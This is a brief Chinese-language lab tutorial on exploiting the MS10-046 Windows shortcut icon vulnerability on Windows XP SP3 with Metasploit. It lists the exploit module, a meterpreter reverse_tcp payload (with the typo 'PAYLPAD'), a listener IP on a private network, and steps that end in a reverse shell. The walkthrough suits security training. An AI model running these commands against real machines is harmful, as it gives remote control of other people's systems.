如果被攻击者显示特指的快捷方式图标或者使用特制的共享时,则该漏洞可能允许远程执行代码。成功利用漏洞的攻击者可以获得与本地用户相同的用户权限。
工具/原料
Metasploit
windows XP SP3
准备阶段
1、获取攻击方IP
2、获取入侵方IP
3、互相ping通
Metasploit使用
1、Metasploit打开
2、找到漏洞模块
3、use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
4、set PAYLPAD windows/meterpreter/reverse_tcp
5、set SRVHOST 192.168.88.227set LHOST 192.168.88.227
使用最后阶段
1、exploit
2、建立共享连接
3、回弹
4、查看连接
5、进入cmd
6、拿到shell
